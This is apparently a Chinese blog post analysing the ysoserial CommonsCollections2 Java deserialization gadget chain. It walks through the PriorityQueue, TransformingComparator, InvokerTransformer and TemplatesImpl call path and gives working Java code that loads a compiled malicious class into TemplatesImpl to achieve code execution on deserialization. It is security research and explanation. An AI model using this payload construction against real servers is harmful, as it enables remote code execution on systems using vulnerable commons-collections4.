CommonsCollections2反序列化漏洞研究记录

反序列化漏洞四个重要方法

Java反序列化的过程中可以自动执行序列化类的四个方法,且反序列化的类必须实现了Serializable接口。可以执行的方法包括readObject、readObjectNoData、readResolve,以及实现了Externalizable接口的readExternal方法。

其中readObject、readObjectNoData、readResolve的定义在ObjectStreamClass中有所规定:

要求readObject、readObjectNoData必须为private方法,返回void,readObject入参是ObjectInputStream、readObjectNoData无入参;readResolve是可继承的方法(可被序列化类调用即可,不能调用父类的private方法),无入参,返回Object;readExternal在Externalizable接口中有所定义,要和该定义对应:

这四个方法中除了readObjectNoData都可以直接通过反序列化该类调用,readObjectNoData方法需要找到它的某个子类,在另一个环境中把子类中对它的继承去掉,然后在原环境中反序列化这个子类,才可以调用这个方法。比如如下的HelloImpl类存在readObjectNoData方法:

然后找到它的一个子类serialTest:

去掉继承关系重新编译并序列化serialTest,生成序列化文件test.ser:


然后恢复HelloImpl的继承关系(如果刚才重新编译是在另一个环境中则可以直接在原环境中进行下一步操作),反序列化test.ser文件,就会执行HelloImpl的readObjectNoData:

readObjectNoData原本的作用是当某个序列化的类在反序列化时已经有了不同的版本(继承了不同的父类)时,可以利用父类的该函数对父类属性值进行对应的反序列化。

CommonsCollections2反序列化漏洞点

Ysoserial中Payload CommonsCollections2反序列化漏洞点是commons-collections4-4.0版本包中的InvokerTransformer类(org.apache.commons.collections4.functors.InvokerTransformer)的transform方法,并且在TransformingComparator(org.apache.commons.collections4.comparators.TransformingComparator)的compare方法中有所调用,该compare方法是java.util.Comparator的compare方法的实现方法。Comparator接口的compare方法在PriorityQueue插入元素时会自动调用,对元素进行比较并排序。而PriorityQueue中就实现了反序列化中可以自动调用的方法readObject:

readObject中的heapify函数就会对元素进行排序,调用到comparator的compare方法:

而comparator是在PriorityQueue的属性值中反序列化出来的,把PriorityQueue的comparator设置为漏洞类TransformingComparator即可触发漏洞。

那么InvokerTransformer(org.apache.commons.collections4.functors.InvokerTransformer)中transform方法的漏洞是什么?

首先Compare方法调用了transformer的transform方法:

其入参是PriorityQueue中的某个反序列化出来的对象,在InvokerTransformer类中的transform方法中允许调用反序列化出来的对象的任意指定public方法:

因此这样就把可以执行的方法范围扩大到了任意可反序列化的对象public方法(实现了Serializable接口的任意类的方法)

用到的Gadget

虽然可以执行任意可反序列化对象的方法,但是仍然不能执行任意代码,因此需要再找到一个反序列化类可以实现代码可执行范围的再扩大化。CommonsCollections2用到的Gadget是com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类,此类就可以帮助我们实现任意代码执行。

TemplatesImpl类首先是一个可以反序列化的类:

然后在其defineTransletClasses方法中可以以自己的属性值_bytecodes作为class的字节码并加载,把新的类存入_class属性中:

但是在这里要注意新加载类的父类必须是ABSTRACT_TRANSLET(com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet),否则会走到else分支报错。然后在getTransletInstance方法中就会调用新加载类的newInstance方法对其进行实例化

在public方法newTransformer中调用了getTransletInstance方法:

因此这样就形成了整个调用链:

PriorityQueue.readObject

 PriorityQueue.heapify

 PriorityQueue.siftDown

  PriorityQueue.siftDownUsingComparator

TransformingComparator.compare

 InvokerTransformer.transform

  TemplatesImpl.newTransformer

   TemplatesImpl.getTransletInstance

   EvilClass.newInstance

Ysoserial使用了javassist组件自动生成恶意类的bytecode,这里我们也可以自己写一个类编译成class文件,再读取这个class文件作为bytecode:

恶意类MyEvilClass:

重写的CommonsCollections2的getObject方法:

public Queue<Object>

getObject(final String command) throws Exception{


//Object templates =Gadgets.createTemplatesImpl(command);

            // mock method name untilarmed

            final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);


// create queue with numbers and basic comparator

            final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));


// stub data for replacement later

            queue.add(1);

            queue.add(1);


byte[] evilClassByte = new byte[10240];

            File f = new File("path/MyEvilClass.class");

       ByteArrayOutputStream bos = new ByteArrayOutputStream((int)f.length());

       BufferedInputStream in = null;


try {

           in = new BufferedInputStream(new FileInputStream(f));

int buf_size = 1024;

byte[] buffer = new byte[buf_size];

int len = 0;

while(-1 != (len = in.read(buffer, 0, buf_size))) {

               bos.write(buffer, 0,len);

           }

           evilClassByte =bos.toByteArray();

       }

catch (Exceptione) {

           e.printStackTrace();

       }

       Object templates = new TemplatesImpl();

       Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{

           evilClassByte

       });


// required to make TemplatesImpl happy

       Reflections.setFieldValue(templates,"_name", "Pwnr");


// switch method called by comparator

       Reflections.setFieldValue(transformer,"iMethodName", "newTransformer");


// switch contents of queue

            final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue,"queue");

            queueArray[0]= templates;

            queueArray[1]= 1;

return queue;

}

最后对生成对象的字节码进行反序列化即可:

(网上针对CommonsCollections2反序列化漏洞的分析文章有很多,在此仅做个人研究记录,如果对您有了帮助,可以点个喜欢,谢谢^_^)

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,142评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,298评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,068评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,081评论 1 291
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,099评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,071评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,990评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,832评论 0 273
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,274评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,488评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,649评论 1 347
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,378评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,979评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,625评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,796评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,643评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,545评论 2 352

推荐阅读更多精彩内容

  • indexOf ( )方法 查找字符串(该方法对大小写敏感,空格也算一个字符) 示例1: var str="Hel...
    kuro_shek阅读 996评论 0 52
  • 学习笔记 TPS QPS一、TPS:Transactions Per Second(每秒传输的事物处理个数),即服...
    紫雨飞星阅读 390评论 0 0
  • ``` python print("hello world!") ``` ```C++ #include void...
    chenymcan阅读 186评论 0 0
  • 真是对不起。 作为一个想要转行的程序媛,我还是把简书的第一篇起成了这种奇怪的名字。 或许“Hello World”...
    Emily2022阅读 160评论 0 0
  • 努力学习,好离开这个鬼地方
    飞宇枫阅读 208评论 0 1